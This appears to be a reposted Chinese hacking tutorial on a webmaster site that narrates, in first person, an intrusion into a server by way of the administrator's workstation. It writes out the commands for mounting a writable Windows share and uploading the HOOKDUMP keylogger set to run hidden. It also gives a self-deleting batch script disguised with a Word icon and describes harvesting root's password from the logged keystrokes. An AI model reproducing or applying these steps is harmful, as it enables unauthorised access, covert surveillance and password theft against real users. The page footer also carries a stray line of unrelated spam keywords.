請登錄后使用快捷導航
沒有帳號？立即注冊

Linux系統入侵案例分析

2022-9-26 10:50| 查看: 2142 |來源: 互聯網

我發現了一個網站，于是常規入侵。很好，它的FINGER開著，于是我編了一個SHELL，aaa帳號試到zzz（by the way，這是我發現的一個網上規律，那就是帳號的長度與口令的強度成正比，如果一個帳號只有兩三位長，那它的口

我發現了一個網站，于是常規入侵。很好，它的FINGER開著，于是我編了一個SHELL，aaa帳號試到zzz（by the way，這是我發現的一個網上規律，那就是帳號的長度與口令的強度成正比，如果一個帳號只有兩三位長，那它的口令一般也很簡單，反之亦然，故且稱之為若氏定理吧），結果一個帳號也不存在，我沒有再試它的帳號。因為我被它開的端口吸引住了，它開著WWW，我就不信它不出錯。一連拿了五種CGI和WWW掃描器總計掃了三四百種常見錯誤它幾乎都不存在。：（有幾個錯誤，但我不知道如何利用，算了。又繞著主機轉了幾圈，象狐貍遇見刺猬，無從下嘴。

　　還是看看root的信息吧：

　　finger root@xxx.xxx.xxx
　　Login name: root In real life: system PRIVILEGED account
　　Directory: / Shell: /bin/sh
　　Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx
　　No Plan.

　　root經常來，那個202.xx.xx.xx就是他用的工作站了，從那會不會看到點東西呢？

　　net view \202.xx.xx.xx
　　Shared resources at \202.xx.xx.xx

　　Sharename Type Comment
　　x
　　x
　　我的公文包
　　The command was completed successfully.

　　在上網的機器上開著WINDOWS的“文件和打印機共享”的服務，是很多人容易掉以輕心的，這個root沒有例外。如果它的C盤共享了而且可寫那就好了，但那是做夢，現在開了共享的目錄沒有一個是根目錄，連D驅的都沒有。別著急，慢慢來。x掉的那些文件夾都沒用，不能寫，里面盡是些英文原著，這個root還挺行的。“我的公文包”吸引了我的注意，這是一個用于將不同的機器上的資料進行同步的工具，很顯然這個root要經常更新主機上的主頁，有時候在自己的機器上編，有時候在主機上編……所以很重要的一點：“我的公文包”的共享一般都是可寫的！

　　那我再進去看看。

　　>net use i: \202.xx.xx.xx
　　>i:
　　>echo asdf>temp.txt

　　不錯，確實可寫。

　　>del temp.txt

　　不留痕跡——黑客的習慣。

　　>dir/od/p

看看都有些什么……　倒數第二排那個是什么？“X月工作計劃.doc”！就是它了，既然是計劃就不可能寫完了就丟一邊，它肯定會再次打開它的——至少下個月寫計劃時要COPY一下:->

該動手了，我的目標就是讓它下次打開時誤中我的陷阱而運行我藏的木馬。我這次用的是一個鍵盤計錄軟件HOOKDUMP，我覺得它挺好的，價錢實惠，量也足……　對不起，說習慣了，應該是它不僅記錄下全部擊鍵，還記錄下打開或關掉了什么程序、按過什么按紐、用過什么菜單……　總之，它的記錄讓你就和你站在他身后看他操作計算機一樣詳細了。您要問那么多木馬你為啥裝這個？要知道無論是中國的冰河、netspy還是外國的netbus、BO，都被各種殺毒軟件列為頭號偵查對象，而一個root的機器上可不可能沒裝殺毒軟件？還是HOOKDUMP好，小小的，不起眼，不過如果大家都用只怕我再用它的機會就少了……

　　>copy hookdump.* i:

　　補充一點：上傳前先編好它的hookdump.ini文件，置為隱藏方式運行，不然root一運行屏幕上蹦出一大窗口可就……。

　　然后再在自己的機器上編一個同名的BAT文件：X月工作計劃.BAT

　　>edit c:X月工作計劃.BAT
　　@echo off
　　hookdump
　　attrib -h X月工作計劃.doc
　　C:Program FilesMicrosoftOfficeWinword X月工作計劃.doc
　　attrib -h temp.bat
　　del temp.pif
　　del temp.bat

　　看明白了吧？root運行了這個BAT文件實際上就是先運行木馬，再調用WINWORD文件打開它想開的這個文件，然后自我刪除，也許它機器上WINWORD的位置不同，那調用就會失敗，不過不要緊，反正BAT會馬上刪除，他會以為是自己的誤操作。

　　這時你的C驅根目錄就有了這么一個BAT文件，它是一個方形的圖標，和那個WORD文件大相徑庭，root怎么會運行它呢？沒關系，在這個文件上點右鍵，點屬性，在“程序”欄選“更改圖標”不就行了嗎？WORD的圖標在你機器C:Program FilesMicrosoftOffice中。還要將“運行”改為“最小化”，“退出時關閉”打上勾，這樣才能保證在運行時一點跡象也沒有。事實上這個BAT文件變成了兩個，還有一個PIF文件就是它的圖標。

　　把這兩個文件傳上去：

　　>copy X月工作計劃.bat i:
　　>copy X月工作計劃.pif i:

　　然后把它的文件和自己的文件都藏起來：

　　>attrib h X月工作計劃.doc
　　>attrib h X月工作計劃.bat

　　這樣，root的“公文包”里只剩下一個和原來一模一樣的WORD圖標，他做夢也沒想到這已變成了一個BAT文件。然后可以喘口氣了，讓我們靜靜的等……

　　幾天后，我進入這個工作站，取下記錄下來的擊鍵記錄，找出root的口令，進入主機。

本文最后更新于 2022-9-26 10:50，某些文章具有時效性，若有錯誤或已失效，請在網站留言或聯系站長：17tui@17tui.com

·END·

站長網微信號：w17tui，關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明：本站部分文章和圖片均來自用戶投稿和網絡收集，旨在傳播知識，文章和圖片版權歸原作者及原出處所有，僅供學習與參考，請勿用于商業用途，如果損害了您的權利，請聯系我們及時修正或刪除。謝謝！

下一篇：通過利用文件包含漏洞對網站進行入侵實驗！上一篇：FileZilla Server 2008 x64 提權與防御方法

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域，為您提供最新最全的互聯網資訊，幫助站長轉型升級，為互聯網創業者提供更加優質的創業信息和品牌營銷服務，與站長一起進步！讓互聯網創業者不再孤獨！

掃一掃，關注站長網微信

精品免费在线观看-精品欧美-精品欧美成人bd高清在线观看-精品欧美高清不卡在线-精品欧美日韩一区二区

Linux系統入侵案例分析

大家都在看

相關分類

熱門排行

最近更新